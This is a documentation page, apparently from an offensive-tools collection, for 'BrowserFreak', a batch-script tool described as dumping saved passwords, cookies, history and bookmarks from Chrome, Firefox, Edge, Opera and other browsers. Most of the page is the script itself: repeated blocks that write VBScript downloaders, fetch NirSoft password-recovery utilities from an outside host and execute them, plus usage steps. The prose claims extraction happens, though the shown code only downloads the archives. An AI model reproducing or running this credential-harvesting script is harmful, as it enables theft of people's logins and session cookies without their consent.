BrowserFreak

BrowserFreak is an automated password dumper for web browsers. It uses a batch script (BrowserFreak.bat) to download and extract saved passwords, cookies, history, and bookmarks from multiple web browsers. The tool supports a wide range of browsers, including Chromium-based browsers (like Google Chrome, Opera, Microsoft Edge), as well as some other browsers like Firefox. It is primarily designed to extract sensitive information that users may have saved within their browsers, such as login credentials and browsing history.

Key Features:

  1. Automated Password Dumping: BrowserFreak automates the process of extracting passwords, cookies, browsing history, and other sensitive data stored within web browsers.

  2. Wide Browser Support: It supports multiple browsers including:

    • Google Chrome

    • Mozilla Firefox

    • Microsoft Edge

    • Opera

    • Brave

    • Vivaldi

    • Yandex

    • Epic Privacy Browser, etc.

  3. Batch Script: The tool is run via a batch script that downloads utilities such as NirSoft’s ChromePass, PasswordFox, and OperaPassView to extract passwords and other stored data from different browsers.

  4. Convenience: BrowserFreak simplifies the process by automating data extraction for multiple browsers in one go, without the need for manual intervention.

How It Works:

  1. Downloading Password Recovery Tools: BrowserFreak uses VBS scripts to download utilities from NirSoft (such as chromepass.zip, passwordfox.zip, iepv.zip, etc.) to extract stored passwords for various browsers. These utilities are used to access and decrypt password storage files within the browser profiles.

  2. Extraction Process: The tool downloads and extracts password, bookmark, and other data from the browser profile folders located in the system directories.

    • Chrome: %temp%\freak\chrome.vbs downloads ChromePass.

    • Firefox: %temp%\freak\fire.vbs downloads PasswordFox.

    • Opera: %temp%\freak\opera.vbs downloads OperaPassView.

    • IE: %temp%\freak\ie.vbs downloads IEPV.

  3. Running the Scripts: The batch script executes the downloaded .vbs scripts, which fetch the password data from browser profiles and save it in the specified directories.

  4. Data Extraction & Downloading: The extracted data, including passwords, cookies, history, and bookmarks, is then saved in files for further analysis.

Example Usage:

  1. Download and Run the Script: To start extracting browser data, run the BrowserFreak.bat script.

    BrowserFreak.bat

  2. Extract Passwords from Chrome, Firefox, and Opera: The batch script will automatically download the required password dumpers and run them to extract passwords and other data from the installed browsers.

::Downlaod Chrome::
echo strFileURL = "http://www.nirsoft.net/utils/chromepass.zip" >
%temp%\freak\chrome.vbs
echo strHDLocation = "%temp%\freak\chromepass.zip" >>
%temp%\freak\chrome.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >>
%temp%\freak\chrome.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\chrome.vbs
echo objXMLHTTP.send() >> %temp%\freak\chrome.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\chrome.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >>
%temp%\freak\chrome.vbs
echo objADOStream.Open >> %temp%\freak\chrome.vbs
echo objADOStream.Type = 1 >> %temp%\freak\chrome.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\chrome.vbs
echo objADOStream.Position = 0 >> %temp%\freak\chrome.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >>
%temp%\freak\chrome.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile
strHDLocation >> %temp%\freak\chrome.vbs
echo Set objFSO = Nothing >> %temp%\freak\chrome.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\chrome.vbs
echo objADOStream.Close >> %temp%\freak\chrome.vbs
echo Set objADOStream = Nothing >> %temp%\freak\chrome.vbs
echo End if >> %temp%\freak\chrome.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\chrome.vbs
call %temp%\freak\chrome.vbs
::Download Firefox::
echo strFileURL = "http://www.nirsoft.net/utils/passwordfox.zip" >
%temp%\freak\fire.vbs
echo strHDLocation = "%temp%\freak\passwordfox.zip" >>
%temp%\freak\fire.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >>
%temp%\freak\fire.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\fire.vbs
echo objXMLHTTP.send() >> %temp%\freak\fire.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\fire.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >>
%temp%\freak\fire.vbs
echo objADOStream.Open >> %temp%\freak\fire.vbs
echo objADOStream.Type = 1 >> %temp%\freak\fire.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\fire.vbs
echo objADOStream.Position = 0 >> %temp%\freak\fire.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >>
%temp%\freak\fire.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile
strHDLocation >> %temp%\freak\fire.vbs
echo Set objFSO = Nothing >> %temp%\freak\fire.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\fire.vbs
echo objADOStream.Close >> %temp%\freak\fire.vbs
echo Set objADOStream = Nothing >> %temp%\freak\fire.vbs
echo End if >> %temp%\freak\fire.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\fire.vbs
call %temp%\freak\fire.vbs
::Download IE::
echo strFileURL = "http://www.nirsoft.net/utils/iepv.zip" >
%temp%\freak\ie.vbs
echo strHDLocation = "%temp%\freak\iepv.zip" >> %temp%\freak\ie.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\ie.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\ie.vbs
echo objXMLHTTP.send() >> %temp%\freak\ie.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\ie.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\ie.vbs
echo objADOStream.Open >> %temp%\freak\ie.vbs
echo objADOStream.Type = 1 >> %temp%\freak\ie.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\ie.vbs
echo objADOStream.Position = 0 >> %temp%\freak\ie.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >>
%temp%\freak\ie.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile
strHDLocation >> %temp%\freak\ie.vbs
echo Set objFSO = Nothing >> %temp%\freak\ie.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\ie.vbs
echo objADOStream.Close >> %temp%\freak\ie.vbs
echo Set objADOStream = Nothing >> %temp%\freak\ie.vbs
echo End if >> %temp%\freak\ie.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\ie.vbs
call %temp%\freak\ie.vbs
::Download Opera::
echo strFileURL = "http://www.nirsoft.net/utils/operapassview.zip" >
%temp%\freak\opera.vbs
echo strHDLocation = "%temp%\freak\operapassview.zip" >>
%temp%\freak\opera.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >>
%temp%\freak\opera.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\opera.vbs
echo objXMLHTTP.send() >> %temp%\freak\opera.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\opera.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >>
%temp%\freak\opera.vbs
echo objADOStream.Open >> %temp%\freak\opera.vbs
echo objADOStream.Type = 1 >> %temp%\freak\opera.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\opera.vbs
echo objADOStream.Position = 0 >> %temp%\freak\opera.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >>
%temp%\freak\opera.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile
strHDLocation >> %temp%\freak\opera.vbs
echo Set objFSO = Nothing >> %temp%\freak\opera.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\opera.vbs
echo objADOStream.Close >> %temp%\freak\opera.vbs
echo Set objADOStream = Nothing >> %temp%\freak\opera.vbs
echo End if >> %temp%\freak\opera.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\opera.vbs
call %temp%\freak\opera.vbs
::Download All:
echo strFileURL = "http://nirsoft.net/utils/webbrowserpassview.zip" >
%temp%\freak\all.vbs
echo strHDLocation = "%temp%\freak\webbrowserpassview.zip" >>
%temp%\freak\all.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >>
%temp%\freak\all.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\all.vbs
echo objXMLHTTP.send() >> %temp%\freak\all.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\all.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >>
%temp%\freak\all.vbs
echo objADOStream.Open >> %temp%\freak\all.vbs
echo objADOStream.Type = 1 >> %temp%\freak\all.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\all.vbs
echo objADOStream.Position = 0 >> %temp%\freak\all.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >>
%temp%\freak\all.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile
strHDLocation >> %temp%\freak\all.vbs
echo Set objFSO = Nothing >> %temp%\freak\all.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\all.vbs
echo objADOStream.Close >> %temp%\freak\all.vbs
echo Set objADOStream = Nothing >> %temp%\freak\all.vbs
echo End if >> %temp%\freak\all.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\all.vbs
call %temp%\freak\all.vbs

Supported Browsers and Profiles:

  • Google Chrome: %temp%\freak\chromepass.zip

  • Mozilla Firefox: %temp%\freak\passwordfox.zip

  • Internet Explorer: %temp%\freak\iepv.zip

  • Opera: %temp%\freak\operapassview.zip

  • Microsoft Edge: Automatically supported through Chromium-based tools.

Script Breakdown:

  • The batch script (BrowserFreak.bat) automates the downloading of password recovery tools from NirSoft.

  • For example, the following lines download the Chrome password tool (chromepass.zip):

    echo strFileURL = "http://www.nirsoft.net/utils/chromepass.zip" > %temp%\freak\chrome.vbs

  • Similar steps are followed for Firefox, Internet Explorer, and Opera, each downloading its respective password extractor tools.

  • File Download Logic: The script makes HTTP requests using MSXML2.XMLHTTP to fetch the .zip files, extracts them, and saves them to the system for further extraction.l.

PreviousHindsightNextBrowserStealer

Last updated